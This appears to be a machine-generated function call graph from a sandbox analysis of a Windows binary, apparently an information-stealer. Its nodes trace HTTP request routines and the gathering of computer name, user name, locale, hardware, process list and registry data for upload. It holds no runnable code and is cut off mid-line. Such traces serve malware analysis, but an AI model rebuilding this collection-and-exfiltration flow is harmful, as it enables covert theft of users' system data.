77519->77520 77520->77486 77521 4046a7 HttpOpenRequestA 77520->77521 77522 4046e5 77521->77522 77523 404a7b InternetCloseHandle 77521->77523 77524 404701 77522->77524 77525 4046eb InternetSetOptionA 77522->77525 77523->77486 77526 40fe90 3 API calls 77524->77526 77525->77524 77527 404712 77526->77527 77528 40fdb0 lstrcpy 77527->77528 77529 40471f 77528->77529 77530 40fe00 2 API calls 77529->77530 77531 40473a 77530->77531 77532 40fdb0 lstrcpy 77531->77532 77533 404747 77532->77533 77534 40fe90 3 API calls 77533->77534 77535 404763 77534->77535 77536 40fdb0 lstrcpy 77535->77536 77537 404770 77536->77537 77538 40fe90 3 API calls 77537->77538 77539 40478e 77538->77539 77540 40fdb0 lstrcpy 77539->77540 77541 40479b 77540->77541 77542 40fe90 3 API calls 77541->77542 77543 4047b7 77542->77543 77544 40fdb0 lstrcpy 77543->77544 77545 4047c4 77544->77545 77546 40fe90 3 API calls 77545->77546 77547 4047e0 77546->77547 77548 40fdb0 lstrcpy 77547->77548 77549 4047ed 77548->77549 77550 40fe00 2 API calls 77549->77550 77551 404808 77550->77551 77552 40fdb0 lstrcpy 77551->77552 77553 404815 77552->77553 77554 40fe90 3 API calls 77553->77554 77555 404831 77554->77555 77556 40fdb0 lstrcpy 77555->77556 77557 40483e 77556->77557 77558 40fe90 3 API calls 77557->77558 77559 40485a 77558->77559 77560 40fdb0 lstrcpy 77559->77560 77561 404867 77560->77561 77562 40fe00 2 API calls 77561->77562 77563 404882 77562->77563 77564 40fdb0 lstrcpy 77563->77564 77565 40488f 77564->77565 77566 40fe90 3 API calls 77565->77566 77567 4048ab 77566->77567 77568 40fdb0 lstrcpy 77567->77568 77569 4048b8 77568->77569 77570 40fe90 3 API calls 77569->77570 77571 4048d6 77570->77571 77572 40fdb0 lstrcpy 77571->77572 77573 4048e3 77572->77573 77574 40fe90 3 API calls 77573->77574 77575 4048ff 77574->77575 77576 40fdb0 lstrcpy 77575->77576 77577 40490c 77576->77577 77578 40fe90 3 API calls 77577->77578 77579 404928 77578->77579 77580 40fdb0 lstrcpy 77579->77580 77581 404935 77580->77581 77582 40fe00 2 API calls 77581->77582 77583 404950 77582->77583 77584 40fdb0 lstrcpy 77583->77584 77585 40495d 77584->77585 77586 40fcd0 lstrcpy 77585->77586 77587 404975 77586->77587 77588 40fe00 2 API calls 77587->77588 77589 404989 77588->77589 77590 40fe00 2 API calls 77589->77590 77591 40499c 77590->77591 77592 40fdb0 lstrcpy 77591->77592 77593 4049a9 77592->77593 77594 4049c9 lstrlenA 77593->77594 77595 4049d9 77594->77595 77596 4049e2 lstrlenA 77595->77596 78444 40ff70 77596->78444 77598 4049f2 HttpSendRequestA InternetReadFile 77599 404a15 77598->77599 77600 404a69 InternetCloseHandle 77598->77600 77599->77600 77604 404a1c 77599->77604 78445 40fd50 77600->78445 77602 40fe90 3 API calls 77602->77604 77603 40fdb0 lstrcpy 77603->77604 77604->77602 77604->77603 77605 404a4e InternetReadFile 77604->77605 77605->77599 77605->77600 78449 40ff70 77606->78449 77608 412687 StrCmpCA 77609 412692 ExitProcess 77608->77609 77610 412699 77608->77610 77611 4126a9 strtok_s 77610->77611 77612 4127e2 77611->77612 77623 4126ba 77611->77623 77612->76601 77613 4127c6 strtok_s 77613->77612 77613->77623 77614 4126f0 StrCmpCA 77614->77613 77614->77623 77615 4126d4 StrCmpCA 77615->77613 77615->77623 77616 412764 StrCmpCA 77616->77613 77616->77623 77617 4127a4 StrCmpCA 77617->77613 77618 412779 StrCmpCA 77618->77613 77618->77623 77619 412728 StrCmpCA 77619->77613 77619->77623 77620 41270c StrCmpCA 77620->77613 77620->77623 77621 41274f StrCmpCA 77621->77613 77621->77623 77622 41278e StrCmpCA 77622->77613 77623->77613 77623->77614 77623->77615 77623->77616 77623->77617 77623->77618 77623->77619 77623->77620 77623->77621 77623->77622 77624 40fd60 2 API calls 77623->77624 77624->77623 77626 40fd10 lstrcpy 77625->77626 77627 405c00 77626->77627 77628 404350 5 API calls 77627->77628 77629 405c0c 77628->77629 77630 40fcd0 lstrcpy 77629->77630 77631 405c2d 77630->77631 77632 40fcd0 lstrcpy 77631->77632 77633 405c41 77632->77633 77634 40fcd0 lstrcpy 77633->77634 77635 405c52 77634->77635 77636 40fcd0 lstrcpy 77635->77636 77637 405c63 77636->77637 77638 40fcd0 lstrcpy 77637->77638 77639 405c74 77638->77639 77640 405c89 InternetOpenA StrCmpCA 77639->77640 77641 405cb4 77640->77641 77642 40639f InternetCloseHandle 77641->77642 77644 411310 2 API calls 77641->77644 77643 4063b5 77642->77643 78456 406e30 CryptStringToBinaryA 77643->78456 77645 405cce 77644->77645 77646 40fe00 2 API calls 77645->77646 77648 405ce2 77646->77648 77650 40fdb0 lstrcpy 77648->77650 77649 4063bb 77651 40fd60 2 API calls 77649->77651 77661 4063e9 77649->77661 77654 405cef 77650->77654 77652 4063ce 77651->77652 77653 40fe90 3 API calls 77652->77653 77655 4063dd 77653->77655 77657 40fe90 3 API calls 77654->77657 77656 40fdb0 lstrcpy 77655->77656 77656->77661 77658 405d17 77657->77658 77659 40fdb0 lstrcpy 77658->77659 77660 405d24 77659->77660 77662 40fe90 3 API calls 77660->77662 77661->76607 77663 405d40 77662->77663 77664 40fdb0 lstrcpy 77663->77664 77665 405d4d 77664->77665 77666 40fe00 2 API calls 77665->77666 77667 405d68 77666->77667 77668 40fdb0 lstrcpy 77667->77668 77669 405d75 77668->77669 77670 40fe90 3 API calls 77669->77670 77671 405d91 77670->77671 77672 40fdb0 lstrcpy 77671->77672 77673 405d9e 77672->77673 77674 40fe90 3 API calls 77673->77674 77675 405dba 77674->77675 77676 40fdb0 lstrcpy 77675->77676 77677 405dc7 77676->77677 77678 40fe90 3 API calls 77677->77678 77679 405de4 77678->77679 77680 40fe00 2 API calls 77679->77680 77681 405df7 77680->77681 77682 40fdb0 lstrcpy 77681->77682 77683 405e04 77682->77683 77684 405e1b InternetConnectA 77683->77684 77685 405e47 HttpOpenRequestA 77684->77685 77686 40639c 77684->77686 77687 406395 InternetCloseHandle 77685->77687 77688 405e85 77685->77688 77686->77642 77687->77686 77689 405ea1 77688->77689 77690 405e8b InternetSetOptionA 77688->77690 77691 40fe90 3 API calls 77689->77691 77690->77689 77692 405eb2 77691->77692 77693 40fdb0 lstrcpy 77692->77693 77694 405ebf 77693->77694 77695 40fe00 2 API calls 77694->77695 77696 405eda 77695->77696 77697 40fdb0 lstrcpy 77696->77697 77698 405ee7 77697->77698 77699 40fe90 3 API calls 77698->77699 77700 405f03 77699->77700 77701 40fdb0 lstrcpy 77700->77701 77702 405f10 77701->77702 77703 40fe90 3 API calls 77702->77703 77704 405f2d 77703->77704 77705 40fdb0 lstrcpy 77704->77705 77706 405f3a 77705->77706 77707 40fe90 3 API calls 77706->77707 77708 405f58 77707->77708 77709 40fdb0 lstrcpy 77708->77709 77710 405f65 77709->77710 77711 40fe90 3 API calls 77710->77711 77712 405f81 77711->77712 77713 40fdb0 lstrcpy 77712->77713 77714 405f8e 77713->77714 77715 40fe00 2 API calls 77714->77715 77716 405fa9 77715->77716 77717 40fdb0 lstrcpy 77716->77717 77718 405fb6 77717->77718 77719 40fe90 3 API calls 77718->77719 77720 405fd2 77719->77720 77721 40fdb0 lstrcpy 77720->77721 77722 405fdf 77721->77722 77723 40fe90 3 API calls 77722->77723 77724 405ffb 77723->77724 77725 40fdb0 lstrcpy 77724->77725 77726 406008 77725->77726 77727 40fe00 2 API calls 77726->77727 77728 406023 77727->77728 77729 40fdb0 lstrcpy 77728->77729 77730 406030 77729->77730 77731 40fe90 3 API calls 77730->77731 77732 40604c 77731->77732 77733 40fdb0 lstrcpy 77732->77733 77734 406059 77733->77734 77735 40fe90 3 API calls 77734->77735 77736 406076 77735->77736 77737 40fdb0 lstrcpy 77736->77737 77738 406083 77737->77738 77739 40fe90 3 API calls 77738->77739 77740 40609f 77739->77740 77741 40fdb0 lstrcpy 77740->77741 77742 4060ac 77741->77742 77743 40fe90 3 API calls 77742->77743 77744 4060c8 77743->77744 77745 40fdb0 lstrcpy 77744->77745 77746 4060d5 77745->77746 77747 402360 lstrcpy 77746->77747 77748 4060e9 77747->77748 77749 40fe00 2 API calls 77748->77749 77750 4060fd 77749->77750 77751 40fdb0 lstrcpy 77750->77751 77752 40610a 77751->77752 77753 40fe90 3 API calls 77752->77753 77754 406132 77753->77754 77755 40fdb0 lstrcpy 77754->77755 77756 40613f 77755->77756 77757 40fe90 3 API calls 77756->77757 77758 40615b 77757->77758 77759 40fdb0 lstrcpy 77758->77759 77760 406168 77759->77760 77761 40fe00 2 API calls 77760->77761 77762 406183 77761->77762 77763 40fdb0 lstrcpy 77762->77763 77764 406190 77763->77764 77765 40fe90 3 API calls 77764->77765 77766 4061ac 77765->77766 77767 40fdb0 lstrcpy 77766->77767 77768 4061b9 77767->77768 77769 40fe90 3 API calls 77768->77769 77770 4061d7 77769->77770 77771 40fdb0 lstrcpy 77770->77771 77772 4061e4 77771->77772 77773 40fe90 3 API calls 77772->77773 77774 406200 77773->77774 77775 40fdb0 lstrcpy 77774->77775 77776 40620d 77775->77776 77777 40fe90 3 API calls 77776->77777 77778 406229 77777->77778 77779 40fdb0 lstrcpy 77778->77779 77780 406236 77779->77780 77781 40fe00 2 API calls 77780->77781 77782 406251 77781->77782 77783 40fdb0 lstrcpy 77782->77783 77784 40625e 77783->77784 77785 406271 lstrlenA 77784->77785 78450 40ff70 77785->78450 77787 406282 lstrlenA GetProcessHeap HeapAlloc 78451 40ff70 77787->78451 77789 4062a5 lstrlenA 78452 40ff70 77789->78452 77791 4062b5 memcpy 78453 40ff70 77791->78453 77793 4062c7 lstrlenA 77794 4062d7 77793->77794 77795 4062e0 lstrlenA memcpy 77794->77795 78454 40ff70 77795->78454 77797 4062fc lstrlenA 78455 40ff70 77797->78455 77799 40630c HttpSendRequestA InternetReadFile 77800 406388 InternetCloseHandle 77799->77800 77802 406332 77799->77802 77800->77687 77801 40fe90 3 API calls 77801->77802 77802->77800 77802->77801 77803 40fdb0 lstrcpy 77802->77803 77804 40636d InternetReadFile 77802->77804 77803->77802 77804->77800 77804->77802 78461 40ff70 77805->78461 77807 41203f strtok_s 77808 41204c 77807->77808 77809 4120a9 77807->77809 77810 40fd60 2 API calls 77808->77810 77811 412092 strtok_s 77808->77811 77812 40fd60 2 API calls 77808->77812 77809->76609 77810->77811 77811->77808 77811->77809 77812->77808 78462 40ff70 77813->78462 77815 411e8f strtok_s 77816 411fbd 77815->77816 77822 411ea0 77815->77822 77816->76617 77817 411fa2 strtok_s 77817->77816 77817->77822 77818 411f74 StrCmpCA 77818->77822 77819 411ed6 StrCmpCA 77819->77822 77820 411f48 StrCmpCA 77820->77822 77821 411f1c StrCmpCA 77821->77822 77822->77817 77822->77818 77822->77819 77822->77820 77822->77821 77823 40fd60 lstrlenA lstrcpy 77822->77823 77823->77822 77825 40fcd0 lstrcpy 77824->77825 77826 415503 77825->77826 77827 40fe90 3 API calls 77826->77827 77828 415519 77827->77828 77829 40fdb0 lstrcpy 77828->77829 77830 415526 77829->77830 78463 402330 77830->78463 77833 40fe00 2 API calls 77834 41554e 77833->77834 77835 40fdb0 lstrcpy 77834->77835 77836 41555b 77835->77836 77837 40fe90 3 API calls 77836->77837 77838 415583 77837->77838 77839 40fdb0 lstrcpy 77838->77839 77840 415590 77839->77840 77841 40fe90 3 API calls 77840->77841 77842 4155ac 77841->77842 77843 40fdb0 lstrcpy 77842->77843 77844 4155b9 77843->77844 77845 40fe90 3 API calls 77844->77845 77846 4155d5 77845->77846 77847 40fdb0 lstrcpy 77846->77847 77848 4155e2 77847->77848 78466 410150 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 77848->78466 77850 4155f2 77851 40fe90 3 API calls 77850->77851 77852 4155ff 77851->77852 77853 40fdb0 lstrcpy 77852->77853 77854 41560c 77853->77854 77855 40fe90 3 API calls 77854->77855 77856 415628 77855->77856 77857 40fdb0 lstrcpy 77856->77857 77858 415635 77857->77858 77859 40fe90 3 API calls 77858->77859 77860 415651 77859->77860 77861 40fdb0 lstrcpy 77860->77861 77862 41565e 77861->77862 78467 410ae0 memset RegOpenKeyExA 77862->78467 77864 41566e 77865 40fe90 3 API calls 77864->77865 77866 41567b 77865->77866 77867 40fdb0 lstrcpy 77866->77867 77868 415688 77867->77868 77869 40fe90 3 API calls 77868->77869 77870 4156a4 77869->77870 77871 40fdb0 lstrcpy 77870->77871 77872 4156b1 77871->77872 77873 40fe90 3 API calls 77872->77873 77874 4156cd 77873->77874 77875 40fdb0 lstrcpy 77874->77875 77876 4156da 77875->77876 77877 410b80 2 API calls 77876->77877 77878 4156ee 77877->77878 77879 40fe00 2 API calls 77878->77879 77880 415702 77879->77880 77881 40fdb0 lstrcpy 77880->77881 77882 41570f 77881->77882 77883 40fe90 3 API calls 77882->77883 77884 415737 77883->77884 77885 40fdb0 lstrcpy 77884->77885 77886 415744 77885->77886 77887 40fe90 3 API calls 77886->77887 77888 415760 77887->77888 77889 40fdb0 lstrcpy 77888->77889 77890 41576d 77889->77890 77891 410be0 12 API calls 77890->77891 77892 415781 77891->77892 77893 40fe00 2 API calls 77892->77893 77894 415795 77893->77894 77895 40fdb0 lstrcpy 77894->77895 77896 4157a2 77895->77896 77897 40fe90 3 API calls 77896->77897 77898 4157ca 77897->77898 77899 40fdb0 lstrcpy 77898->77899 77900 4157d7 77899->77900 77901 40fe90 3 API calls 77900->77901 77902 4157f3 77901->77902 77903 40fdb0 lstrcpy 77902->77903 77904 415800 77903->77904 77905 41580b GetCurrentProcessId 77904->77905 78471 411880 OpenProcess 77905->78471 77908 40fe00 2 API calls 77909 41582f 77908->77909 77910 40fdb0 lstrcpy 77909->77910 77911 41583c 77910->77911 77912 40fe90 3 API calls 77911->77912 77913 415864 77912->77913 77914 40fdb0 lstrcpy 77913->77914 77915 415871 77914->77915 77916 40fe90 3 API calls 77915->77916 77917 41588d 77916->77917 77918 40fdb0 lstrcpy 77917->77918 77919 41589a 77918->77919 77920 40fe90 3 API calls 77919->77920 77921 4158b6 77920->77921 77922 40fdb0 lstrcpy 77921->77922 77923 4158c3 77922->77923 77924 40fe90 3 API calls 77923->77924 77925 4158df 77924->77925 77926 40fdb0 lstrcpy 77925->77926 77927 4158ec 77926->77927 78476 410d90 GetProcessHeap HeapAlloc 77927->78476 77929 4158fc 77930 40fe90 3 API calls 77929->77930 77931 415909 77930->77931 77932 40fdb0 lstrcpy 77931->77932 77933 415916 77932->77933 77934 40fe90 3 API calls 77933->77934 77935 415932 77934->77935 77936 40fdb0 lstrcpy 77935->77936 77937 41593f 77936->77937 77938 40fe90 3 API calls 77937->77938 77939 41595b 77938->77939 77940 40fdb0 lstrcpy 77939->77940 77941 415968 77940->77941 78483 410ee0 CoInitializeEx CoInitializeSecurity CoCreateInstance 77941->78483 77943 41597c 77944 40fe00 2 API calls 77943->77944 77945 415990 77944->77945 77946 40fdb0 lstrcpy 77945->77946 77947 41599d 77946->77947 77948 40fe90 3 API calls 77947->77948 77949 4159c5 77948->77949 77950 40fdb0 lstrcpy 77949->77950 77951 4159d2 77950->77951 77952 40fe90 3 API calls 77951->77952 77953 4159ee 77952->77953 77954 40fdb0 lstrcpy 77953->77954 77955 4159fb 77954->77955 78497 4110a0 CoInitializeEx CoInitializeSecurity CoCreateInstance 77955->78497 77957 415a0f 77958 40fe00 2 API calls 77957->77958 77959 415a23 77958->77959 77960 40fdb0 lstrcpy 77959->77960 77961 415a30 77960->77961 77962 40fe90 3 API calls 77961->77962 77963 415a58 77962->77963 77964 40fdb0 lstrcpy 77963->77964 77965 415a65 77964->77965 77966 40fe90 3 API calls 77965->77966 77967 415a81 77966->77967 77968 40fdb0 lstrcpy 77967->77968 77969 415a8e 77968->77969 78511 410110 GetProcessHeap HeapAlloc GetComputerNameA 77969->78511 77972 40fe90 3 API calls 77973 415aab 77972->77973 77974 40fdb0 lstrcpy 77973->77974 77975 415ab8 77974->77975 77976 40fe90 3 API calls 77975->77976 77977 415ad4 77976->77977 77978 40fdb0 lstrcpy 77977->77978 77979 415ae1 77978->77979 77980 40fe90 3 API calls 77979->77980 77981 415afd 77980->77981 77982 40fdb0 lstrcpy 77981->77982 77983 415b0a 77982->77983 78513 4100d0 GetProcessHeap HeapAlloc GetUserNameA 77983->78513 77985 415b1a 77986 40fe90 3 API calls 77985->77986 77987 415b27 77986->77987 77988 40fdb0 lstrcpy 77987->77988 77989 415b34 77988->77989 77990 40fe90 3 API calls 77989->77990 77991 415b50 77990->77991 77992 40fdb0 lstrcpy 77991->77992 77993 415b5d 77992->77993 77994 40fe90 3 API calls 77993->77994 77995 415b79 77994->77995 77996 40fdb0 lstrcpy 77995->77996 77997 415b86 77996->77997 78514 410a60 7 API calls 77997->78514 78000 40fe00 2 API calls 78001 415bae 78000->78001 78002 40fdb0 lstrcpy 78001->78002 78003 415bbb 78002->78003 78004 40fe90 3 API calls 78003->78004 78005 415be3 78004->78005 78006 40fdb0 lstrcpy 78005->78006 78007 415bf0 78006->78007 78008 40fe90 3 API calls 78007->78008 78009 415c0c 78008->78009 78010 40fdb0 lstrcpy 78009->78010 78011 415c19 78010->78011 78517 410220 78011->78517 78014 40fe00 2 API calls 78015 415c44 78014->78015 78016 40fdb0 lstrcpy 78015->78016 78017 415c51 78016->78017 78018 40fe90 3 API calls 78017->78018 78019 415c7f 78018->78019 78020 40fdb0 lstrcpy 78019->78020 78021 415c8c 78020->78021 78022 40fe90 3 API calls 78021->78022 78023 415cab 78022->78023 78024 40fdb0 lstrcpy 78023->78024 78025 415cb8 78024->78025 78527 410150 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 78025->78527 78027 415cc8 78028 40fe90 3 API calls 78027->78028 78029 415cd5 78028->78029 78030 40fdb0 lstrcpy 78029->78030 78031 415ce2 78030->78031 78032 40fe90 3 API calls 78031->78032 78033 415d01 78032->78033 78034 40fdb0 lstrcpy 78033->78034 78035 415d0e 78034->78035 78036 40fe90 3 API calls 78035->78036 78037 415d30 78036->78037 78038 40fdb0 lstrcpy 78037->78038 78039 415d3d 78038->78039 78528 4101b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 78039->78528 78042 40fe90 3 API calls 78043 415d60 78042->78043 78044 40fdb0 lstrcpy 78043->78044 78045 415d6d 78044->78045 78046 40fe90 3 API calls 78045->78046 78047 415d8f 78046->78047 78048 40fdb0 lstrcpy 78047->78048 78049 415d9c 78048->78049 78050 40fe90 3 API calls 78049->78050 78051 415dbe 78050->78051 78052 40fdb0 lstrcpy 78051->78052 78053 415dcb 78052->78053 78054 40fe90 3 API calls 78053->78054 78055 415ded 78054->78055 78056 40fdb0 lstrcpy 78055->78056 78057 415dfa 78056->78057 78531 410380 GetProcessHeap HeapAlloc RegOpenKeyExA 78057->78531 78060 40fe90 3 API calls 78061 415e1d 78060->78061 78062 40fdb0 lstrcpy 78061->78062 78063 415e2a 78062->78063 78064 40fe90 3 API calls 78063->78064 78065 415e4c 78064->78065 78066 40fdb0 lstrcpy 78065->78066 78067 415e59 78066->78067 78068 40fe90 3 API calls 78067->78068 78069 415e78 78068->78069 78070 40fdb0 lstrcpy 78069->78070 78071 415e85 78070->78071 78534 410430 GetLogicalProcessorInformationEx 78071->78534 78073 415e95 78074 40fe90 3 API calls 78073->78074 78075 415ea2 78074->78075 78076 40fdb0 lstrcpy 78075->78076 78077 415eaf 78076->78077 78078 40fe90 3 API calls 78077->78078 78079 415ece 78078->78079 78080 40fdb0 lstrcpy 78079->78080 78081 415edb 78080->78081 78082 40fe90 3 API calls 78081->78082 78083 415efa 78082->78083 78084 40fdb0 lstrcpy 78083->78084 78085 415f07 78084->78085 78550 4103f0 GetSystemInfo wsprintfA 78085->78550 78087 415f17 78088 40fe90 3 API calls 78087->78088 78089 415f24 78088->78089 78090 40fdb0 lstrcpy 78089->78090 78091 415f31 78090->78091 78092 40fe90 3 API calls 78091->78092 78093 415f50 78092->78093 78094 40fdb0 lstrcpy 78093->78094 78095 415f5d 78094->78095 78096 40fe90 3 API calls 78095->78096 78097 415f7c 78096->78097 78098 40fdb0 lstrcpy 78097->78098 78099 415f89 78098->78099 78551 410530 GetProcessHeap HeapAlloc 78099->78551 78101 415f99 78102 40fe90 3 API calls 78101->78102 78103 415fa6 78102->78103 78104 40fdb0 lstrcpy 78103->78104 78105 415fb3 78104->78105 78106 40fe90 3 API calls 78105->78106 78107 415fd2 78106->78107 78108 40fdb0 lstrcpy 78107->78108 78109 415fdf 78108->78109 78110 40fe90 3 API calls 78109->78110 78111 416001 78110->78111 78112 40fdb0 lstrcpy 78111->78112 78113 41600e 78112->78113 78114 40fe90 3 API calls 78113->78114 78115 416030 78114->78115 78116 40fdb0 lstrcpy 78115->78116 78117 41603d 78116->78117 78556 4105a0 78117->78556 78120 40fe00 2 API calls 78121 41606e 78120->78121 78122 40fdb0 lstrcpy 78121->78122 78123 41607b 78122->78123 78124 40fe90 3 API calls 78123->78124 78125 4160ac 78124->78125 78126 40fdb0 lstrcpy 78125->78126 78127 4160b9 78126->78127 78128 40fe90 3 API calls 78127->78128 78129 4160db 78128->78129 78130 40fdb0 lstrcpy 78129->78130 78131 4160e8 78130->78131 78564 410950 78131->78564 78133 416102 78134 40fe00 2 API calls 78133->78134 78135 416119 78134->78135 78136 40fdb0 lstrcpy 78135->78136 78137 416126 78136->78137 78138 40fe90 3 API calls 78137->78138 78139 416157 78138->78139 78140 40fdb0 lstrcpy 78139->78140 78141 416164 78140->78141 78142 40fe90 3 API calls 78141->78142 78143 416186 78142->78143 78144 40fdb0 lstrcpy 78143->78144 78145 416193 78144->78145 78573 4106b0 78145->78573 78147 4161b2 78148 40fe00 2 API calls 78147->78148 78149 4161c9 78148->78149 78150 40fdb0 lstrcpy 78149->78150 78151 4161d6 78150->78151 78152 4106b0 13 API calls 78151->78152 78153 416204 78152->78153 78154 40fe00 2 API calls 78153->78154 78155 41621b 78154->78155 78156 40fdb0 lstrcpy 78155->78156 78157 416228 78156->78157 78158 40fe90 3 API calls 78157->78158 78159 416256 78158->78159 78160 40fdb0 lstrcpy 78159->78160 78161 416263 78160->78161 78162 416276 lstrlenA 78161->78162 78163 416286 78162->78163 78164 40fcd0 lstrcpy 78163->78164 78165 41629c 78164->78165 78166 401060 lstrcpy 78165->78166 78167 4162b4 78166->78167 78590 415250 78167->78590 78169 4162c0 78169->76621 78171 40fd10 lstrcpy 78170->78171 78172 404b59 78171->78172 78173 404350 5 API calls 78172->78173 78174 404b65 GetProcessHeap RtlAllocateHeap 78173->78174 78849 40ff70 78174->78849 78176 404b9f InternetOpenA StrCmpCA 78177 404bc0 78176->78177 78178 404d28 InternetCloseHandle 78177->78178 78179 404bce InternetConnectA 78177->78179 78186 404d3b 78178->78186 78180 404bf4 HttpOpenRequestA 78179->78180 78181 404d1e InternetCloseHandle 78179->78181 78182 404d14 InternetCloseHandle 78180->78182 78183 404c2c 78180->78183 78181->78178 78182->78181 78184 404c30 InternetSetOptionA 78183->78184 78185 404c49 HttpSendRequestA HttpQueryInfoA 78183->78185 78184->78185 78187 404c7e 78185->78187 78190 404cb1 78185->78190 78186->76627 78187->76627 78188 404d11 78188->78182 78189 404cd0 InternetReadFile 78189->78188 78189->78190 78190->78187 78190->78188 78190->78189 78850 406c80 78191->78850 78193 40ea67 78194 40fd10 lstrcpy 78193->78194 78195 40ea7f 78194->78195 78197 40e85f StrCmpCA 78225 40e830 78197->78225 78200 401060 lstrcpy 78200->78225 78201 40e8e1 StrCmpCA 78201->78225 78204 40fcd0 lstrcpy 78204->78225 78206 40ea05 StrCmpCA 78206->78225 78211 40fe00 2 API calls 78211->78225 78214 40fd10 lstrcpy 78214->78225 78216 40fe90 lstrlenA lstrcpy lstrcat 78216->78225 78218 40fdb0 lstrcpy 78218->78225 78225->78193 78225->78197 78225->78200 78225->78201 78225->78204 78225->78206 78225->78211 78225->78214 78225->78216 78225->78218 78854 40dea0 78225->78854 78906 40e1d0 78225->78906 79019 40ba40 78225->79019 78404 40fcd0 lstrcpy 78403->78404 78405 4023db 78404->78405 78405->77437 78406->77437 78407->77437 78408->77437 78409->77437 78410->77407 78411->77421 78412->77384 78413->77408 78414->77364 78415->77383 78416->77349 78417->77363 78419 40fcd0 lstrcpy 78418->78419 78420 40240b 78419->78420 78420->77338 78421->77348 78423 410ba2 78422->78423 78424 410bb4 78422->78424 78426 40fcd0 lstrcpy 78423->78426 78425 40fcd0 lstrcpy 78424->78425 78427 410bc0 78425->78427 78428 410bad 78426->78428 78427->77460 78428->77460 78429->77464 78431 404380 78430->78431 78431->78431 78432 404387 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 78431->78432 78447 40ff70 78432->78447 78434 4043d5 lstrlenA 78448 40ff70 78434->78448 78436 4043e5 InternetCrackUrlA 78437 40440a 78436->78437 78437->77473 78439 40fcd0 lstrcpy 78438->78439 78440 411345 78439->78440 78441 40fcd0 lstrcpy 78440->78441 78442 41135e GetSystemTime 78441->78442 78443 41137d 78442->78443 78443->77488 78444->77598 78446 40fd58 78445->78446 78446->77523 78447->78434 78448->78436 78449->77608 78450->77787 78451->77789 78452->77791 78453->77793 78454->77797 78455->77799 78457 406e61 LocalAlloc 78456->78457 78458 406e9b 78456->78458 78457->78458 78459 406e72 CryptStringToBinaryA 78457->78459 78458->77649 78459->78458 78460 406e89 LocalFree 78459->78460 78460->77649 78461->77807 78462->77815 78464 40fcd0 lstrcpy 78463->78464 78465 40234b 78464->78465 78465->77833 78466->77850 78468 410b4a CharToOemA 78467->78468 78469 410b2c RegQueryValueExA 78467->78469 78468->77864 78469->78468 78472 4118c4 78471->78472 78473 4118a8 K32GetModuleFileNameExA CloseHandle 78471->78473 78474 40fcd0 lstrcpy 78472->78474 78473->78472 78475 4118d5 78474->78475 78475->77908 78605 410050 GetProcessHeap HeapAlloc RegOpenKeyExA 78476->78605 78478 410db9 78479 410dc0 78478->78479 78480 410dca RegOpenKeyExA 78478->78480 78479->77929 78481 410e02 78480->78481 78482 410deb RegQueryValueExA 78480->78482 78481->77929 78482->78481 78484 410f51 78483->78484 78485 41106e 78484->78485 78486 410f59 CoSetProxyBlanket 78484->78486 78487 40fcd0 lstrcpy 78485->78487 78488 410f8c 78486->78488 78489 411084 78487->78489 78488->78485 78490 410f94 78488->78490 78489->77943 78490->78489 78491 410fc2 VariantInit 78490->78491 78492 410fe6 78491->78492 78608 410e20 CoCreateInstance 78492->78608 78494 410ff5 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 78495 40fcd0 lstrcpy 78494->78495 78496 411053 VariantClear 78495->78496 78496->77943 78498 411111 78497->78498 78499 411119 CoSetProxyBlanket 78498->78499 78500 4111d4 78498->78500 78502 41114c 78499->78502 78501 40fcd0 lstrcpy 78500->78501 78503 4111ea 78501->78503 78502->78500 78504 411154 78502->78504 78503->77957 78504->78503 78505 41117e VariantInit 78504->78505 78506 4111a2 78505->78506 78614 4114b0 LocalAlloc CharToOemW 78506->78614 78508 4111ab 78509 40fcd0 lstrcpy 78508->78509 78510 4111b9 VariantClear 78509->78510 78510->77957 78512 410146 78511->78512 78512->77972 78513->77985 78515 40fcd0 lstrcpy 78514->78515 78516 410ad3 78515->78516 78516->78000 78518 40fcd0 lstrcpy 78517->78518 78519 410258 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 78518->78519 78520 410352 78519->78520 78526 410297 78519->78526 78521 410360 78520->78521 78522 410359 LocalFree 78520->78522 78521->78014 78522->78521 78523 4102a0 GetLocaleInfoA 78523->78526 78524 40fe90 lstrlenA lstrcpy lstrcat 78524->78526 78525 40fdb0 lstrcpy 78525->78526 78526->78520 78526->78523 78526->78524 78526->78525 78527->78027 78529 4101e2 wsprintfA 78528->78529 78530 41020b 78528->78530 78529->78530 78530->78042 78532 4103c5 RegQueryValueExA 78531->78532 78533 4103dc 78531->78533 78532->78533 78533->78060 78535 41045c 78534->78535 78539 4104a2 78534->78539 78536 410460 GetLastError 78535->78536 78547 410473 78535->78547 78536->78535 78538 410504 78536->78538 78546 41050e 78538->78546 78618 4112b0 GetProcessHeap HeapFree 78538->78618 78617 4112b0 GetProcessHeap HeapFree 78539->78617 78540 4104cb 78541 4104d5 wsprintfA 78540->78541 78542 41051d 78540->78542 78541->78073 78542->78073 78546->78073 78548 4104f8 78547->78548 78549 41048e GetLogicalProcessorInformationEx 78547->78549 78615 4112b0 GetProcessHeap HeapFree 78547->78615 78616 4112d0 GetProcessHeap HeapAlloc 78547->78616 78548->78073 78549->78536 78549->78539 78550->78087 78619 411260 78551->78619 78554 410570 wsprintfA 78554->78101 78557 40fcd0 lstrcpy 78556->78557 78558 4105d8 EnumDisplayDevicesA 78557->78558 78559 410692 78558->78559 78561 410605 78558->78561 78559->78120 78560 40fe90 lstrlenA lstrcpy lstrcat 78560->78561 78561->78560 78562 40fdb0 lstrcpy 78561->78562 78563 41066d EnumDisplayDevicesA 78561->78563 78562->78561 78563->78559 78563->78561 78565 40fcd0 lstrcpy 78564->78565 78566 410988 CreateToolhelp32Snapshot Process32First 78565->78566 78567 4109b9 Process32Next 78566->78567 78568 410a38 CloseHandle 78566->78568 78567->78568 78571 4109cb 78567->78571 78568->78133 78569 40fe90 lstrlenA lstrcpy lstrcat 78569->78571 78570 40fdb0 lstrcpy 78570->78571 78571->78569 78571->78570 78572 410a26 Process32Next 78571->78572 78572->78568 78572->78571 78574 40fcd0 lstrcpy 78573->78574 78575 4106e2 RegOpenKeyExA 78574->78575 78576 410719 78575->78576 78589 410748 78575->78589 78578 40fd10 lstrcpy 78576->78578 78577 410750 RegEnumKeyExA 78579 41077e wsprintfA RegOpenKeyExA 78577->78579 78577->78589 78580 410727 78578->78580 78581 